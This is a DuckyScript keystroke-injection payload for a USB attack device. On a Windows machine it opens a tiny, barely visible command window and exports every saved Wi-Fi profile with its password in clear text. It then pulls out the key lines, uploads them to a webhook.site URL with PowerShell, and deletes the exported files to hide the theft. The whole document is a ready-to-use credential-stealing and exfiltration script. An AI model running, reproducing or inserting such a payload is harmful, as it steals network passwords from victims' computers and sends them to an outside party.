DELAY 6000 
ALT
DELAY 500
STRING f
DELAY 500 
GUI r
DELAY 1000
STRING cmd /k mode con: cols=25 lines=1
DELAY 100
ENTER
DELAY 1000
STRING cd %temp%
ENTER 
DELAY 500
STRING netsh wlan export profile key=clear
ENTER
DELAY 500
STRING powershell Select-String -Path Wi-Fi-*.xml -Pattern 'keyMaterial' > WiFi-key
ENTER
DELAY 1000
DELAY 500
STRING powershell Invoke-WebRequest -Uri https://webhook.site/43a979c8-3f7f-4ef3-8622-82dac21c31ad -Method Post -Infile WiFi-key
ENTER
STRING del Wi* /s/f/q
ENTER
DELAY 500
STRING exit
ENTER